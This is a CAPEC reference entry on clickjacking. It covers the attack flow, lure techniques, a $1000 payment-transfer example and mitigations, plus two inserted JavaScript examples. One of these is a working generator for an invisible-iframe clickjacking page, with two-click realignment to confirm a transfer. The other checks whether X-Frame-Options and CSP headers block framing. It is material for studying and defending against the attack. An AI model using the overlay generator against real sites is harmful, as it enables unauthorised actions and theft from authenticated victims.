In a clickjacking attack the victim is tricked into unknowingly initiating
some action in one system while interacting with the UI of a seemingly
completely different system. While logged in to the target system, the
victim visits the attacker's malicious site, which displays a UI that the
victim wishes to interact with. In reality, the clickjacked page has a
transparent layer above the visible UI containing the action controls that
the attacker wishes the victim to execute. The victim clicks on buttons or
other UI elements they see on the page, which actually triggers the action
controls in the transparent overlaying layer. Depending on what that action
control is, the attacker may have just tricked the victim into executing
some potentially privileged (and most certainly undesired) functionality in
the target system to which the victim is authenticated. The basic problem
here is the dichotomy between what the victim thinks they are clicking on
and what they are actually clicking on.
Attack Execution Flow

Experiment

1. Craft a clickjacking page:
The attacker utilizes web page layering techniques to try to craft a
malicious clickjacking page.

Attack Step Techniques
ID | Attack Step Technique Description | Environments
1 | The attacker leverages iFrame overlay capabilities to craft a malicious clickjacking page | env-Web
2 | The attacker leverages Flash file overlay capabilities to craft a malicious clickjacking page | env-Web
3 | The attacker leverages Silverlight overlay capabilities to craft a malicious clickjacking page | env-Web
4 | The attacker leverages cross-frame scripting to craft a malicious clickjacking page | env-Web

Indicators
ID | Type | Indicator Description | Environments
1 | Positive | Overlay capabilities are enabled in the browser | env-Web

Outcomes
ID | Type | Outcome Description
1 | Success | A page is created that performs unseen actions when the user interacts with the visible UI

Security Controls
ID | Type | Security Control Description
1 | Preventative | Disable overlay functionality in the browser. This can have an obvious impact on the utility of the browser with some sites and web applications.

Exploit

2. Attacker lures victim to clickjacking page:
The attacker utilizes some form of temptation, misdirection or coercion to
lure the victim into loading and interacting with the clickjacking page in
a way that increases the chances that the victim will click in the right
areas.

Attack Step Techniques
ID | Attack Step Technique Description | Environments
1 | Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site. | env-Web
2 | Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim. | env-Web
3 | Lure the victim to the malicious site through a cross-site scripting attack. | env-Web

Outcomes
ID | Type | Outcome Description
1 | Success | The victim loads the clickjacking page.

3. Trick victim into interacting with the clickjacking page in the desired
manner:
The attacker tricks the victim into clicking on the areas of the UI which
contain the hidden action controls and thereby interacts with the target
system maliciously with the victim's level of privilege.

Attack Step Techniques
ID | Attack Step Technique Description | Environments
1 | Hide action controls over very commonly used functionality. | env-Web
2 | Hide action controls over very psychologically tempting content. | env-Web
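The iFrame overlay technique from step 1, together with the two-click
realignment used in the payment example further down, as an added example
(this is illustrative code written for this page, not CAPEC's or any real
site's). The target URL, the pixel positions of the target's "send" and
"confirm" buttons, and the decoy layout are all hypothetical values; in a real
engagement they are measured from the framed page. The generator computes the
iframe offset that puts the hidden control exactly under the visible decoy and
emits the page as a string.

```javascript
// Added example: generate a clickjacking page that layers an invisible iframe
// of the target over a decoy "skip this ad" button. Hypothetical values only.

// Geometry of the sensitive controls inside the framed target page, in CSS
// pixels from the framed document's top-left corner (hypothetical numbers).
const TARGET = {
  url: "https://payments.example/transfer?to=attacker&amount=1000",
  sendButton:    { x: 420, y: 610, w: 120, h: 36 },
  confirmButton: { x: 520, y: 700, w: 120, h: 36 },
};

// Where the decoy button is drawn on the attacker's page (hypothetical).
const DECOY = { x: 300, y: 200, w: 120, h: 36 };

// Offset to apply to the iframe so that `control` lands exactly on `decoy`.
// A negative value means the frame is shifted up/left, off the visible area.
function overlayOffset(control, decoy) {
  return { left: decoy.x - control.x, top: decoy.y - control.y };
}

// Every click inside the decoy rectangle must also fall inside the hidden
// control; otherwise some clicks miss and the attack silently fails.
function decoyCovered(control, decoy) {
  return control.w >= decoy.w && control.h >= decoy.h;
}

// Build the page. The iframe has a higher z-index than the decoy and opacity 0,
// so the victim sees the decoy while the click is delivered to the frame.
function buildClickjackPage(target, decoy) {
  if (!decoyCovered(target.sendButton, decoy) ||
      !decoyCovered(target.confirmButton, decoy)) {
    throw new Error("decoy is larger than the hidden control");
  }
  const first = overlayOffset(target.sendButton, decoy);
  const second = overlayOffset(target.confirmButton, decoy);
  return `<!doctype html>
<html><body>
<div id="ad" style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;">
  <p>Advertisement</p>
  <button style="width:${decoy.w}px;height:${decoy.h}px;">skip this ad</button>
</div>
<iframe id="victim" src="${target.url}" scrolling="no"
  style="position:absolute;left:${first.left}px;top:${first.top}px;
         width:1200px;height:900px;opacity:0;z-index:10;border:0;">
</iframe>
<script>
  // The attacker cannot read into the cross-origin frame, but a click on it
  // moves focus there and fires 'blur' on the outer window (a heuristic).
  // After the first hijacked click, realign so the confirm button now sits
  // under the same decoy; the victim's second click confirms the transfer.
  var clicks = 0;
  var f = document.getElementById('victim');
  window.addEventListener('blur', function () {
    if (++clicks === 1) {
      f.style.left = '${second.left}px';
      f.style.top = '${second.top}px';
    }
  });
</script>
</body></html>`;
}
```

The only state the attacker needs is the geometry of the target page; nothing
is read back from the frame, which is why the attack works across origins.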
Attack Prerequisites
The victim is communicating with the target application via a web based UI
and not a thick client
The victim's browser security policies allow at least one of the following:
JavaScript, Flash, iFrames, ActiveX, or CSS.
The victim uses a modern browser that supports UI elements like clickable
buttons (i.e. not an old text-only browser).
The victim has an active session with the target system.
The target system's interaction window is open in the victim's browser and
supports the ability for initiating sensitive actions on behalf of the user
in the target system
Typical Likelihood of Exploit
Likelihood: Medium
Methods of Attack
Spoofing
Social Engineering
Examples-Instances
Description
A victim has an authenticated session with a site that provides an
electronic payment service to transfer funds between subscribing
members. At the same time, the victim receives an e-mail that appears to
come from an online publication to which he or she subscribes, with links
to today's news articles. The victim clicks on one of these links and is
taken to a page with the news story. An advertisement appears on top of
the news article with a 'skip this ad' button. Eager to read the news
article, the user clicks on this button. Nothing happens. The user clicks
on the button one more time and still nothing happens.
In reality, the victim activated a hidden action control located in a
transparent layer above the 'skip this ad' button. The ad screen
blocking the news article made it likely that the victim would click on
the 'skip this ad' button. Clicking on the button actually initiated
the transfer of $1000 from the victim's account with the electronic
payment service to the attacker's account. Clicking on the 'skip this ad'
button the second time (after nothing seemingly happened the first time)
confirmed the transfer of funds to the attacker's account.
Attacker Skills or Knowledge Required
Skill or Knowledge Level: High
Crafting the proper malicious site and luring the victim to this site
are not trivial tasks.
Resources Required
Low: A computer connected to the internet.
Solutions and Mitigations
If using the Firefox browser, use the NoScript plug-in, which can forbid
iFrames.
Enforce maximum security restrictions in the browser: JavaScript disabled,
Flash disabled, CSS disabled, iFrames forbidden. This will break many
legitimate sites, so it is a trade-off rather than a free mitigation.
When maintaining an authenticated session with a privileged target system,
do not use the same browser to navigate to unfamiliar sites to perform other
activities. Finish working with the target system and log out first before
proceeding to other tasks.
All of the above are end-user measures. The target application itself can
refuse to be rendered inside a frame on another origin (for example with the
X-Frame-Options response header), which removes the overlay layer the attack
depends on regardless of the victim's browser settings.
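The first thing a tester checks before attempting the attack is whether the
target page can be framed at all, and the first thing a defender checks is
whether their own response actually says "no". The following added example
(written for this page, not taken from CAPEC or any product) classifies a raw
HTTP response header block against a hypothetical attacker origin. The sample
responses are constructed; matching of CSP host-sources is simplified to exact
origin comparison, which is an assumption stated in the code.

```javascript
// Added example: decide whether a target response lets an attacker's origin
// frame the page. Header samples are constructed; host matching is simplified.

// Parse a raw header block into a map keyed by lowercase header name. Repeated
// headers are kept as a comma-joined list, as HTTP list syntax allows.
function parseHeaders(raw) {
  const out = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i < 0) continue;                       // status line and blank lines
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    out[name] = name in out ? out[name] + ", " + value : value;
  }
  return out;
}

// Returns "blocked", "allowed" or "unprotected" for attackerOrigin.
// A CSP frame-ancestors directive, when present, takes precedence over
// X-Frame-Options; unrecognised X-Frame-Options values are ignored by
// browsers, so they leave the page frameable.
function frameability(headers, attackerOrigin) {
  const origin = attackerOrigin.toLowerCase();
  const csp = headers["content-security-policy"];
  if (csp) {
    const m = /(?:^|;)\s*frame-ancestors\s+([^;]*)/i.exec(csp);
    if (m) {
      const sources = m[1].trim().split(/\s+/)
        .map(s => s.replace(/^'|'$/g, "").toLowerCase());
      if (sources.includes("none")) return "blocked";
      // Assumption: exact origin match only; wildcard host-sources such as
      // https://*.example are not expanded here.
      if (sources.includes("*") || sources.includes(origin)) return "allowed";
      return "blocked";                        // 'self' or other origins only
    }
  }
  const xfo = headers["x-frame-options"];
  if (xfo) {
    const values = xfo.split(",").map(v => v.trim().toUpperCase());
    if (values.includes("DENY")) return "blocked";
    if (values.every(v => v === "SAMEORIGIN")) return "blocked";
    // ALLOW-FROM is obsolete and typos like "DENNY" are ignored: no protection.
  }
  return "unprotected";
}

// Constructed sample responses (not captured from any real site).
const SAMPLES = {
  deny:     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: DENY\r\n",
  typo:     "HTTP/1.1 200 OK\r\nX-Frame-Options: DENNY\r\n",
  allowFrom:"HTTP/1.1 200 OK\r\nX-Frame-Options: ALLOW-FROM https://partner.example\r\n",
  cspSelf:  "HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; frame-ancestors 'self' https://partner.example\r\nX-Frame-Options: DENNY\r\n",
  cspAny:   "HTTP/1.1 200 OK\r\nContent-Security-Policy: frame-ancestors *\r\nX-Frame-Options: DENY\r\n",
  none:     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n",
};

function classifyAll(attackerOrigin) {
  const result = {};
  for (const [name, raw] of Object.entries(SAMPLES)) {
    result[name] = frameability(parseHeaders(raw), attackerOrigin);
  }
  return result;
}
```

Note the `cspAny` sample: the X-Frame-Options DENY there is dead weight because
the CSP directive wins, so a policy review has to read both headers together.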
Related Security Principles
Shed elevated privileges as soon as possible (i.e. log out of the target
application once finished with it and before doing other things in the
browser)
Vision and Technical Leadership provided by Cigital, Inc.
This Web site is hosted by The MITRE Corporation.
Copyright 2009, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation.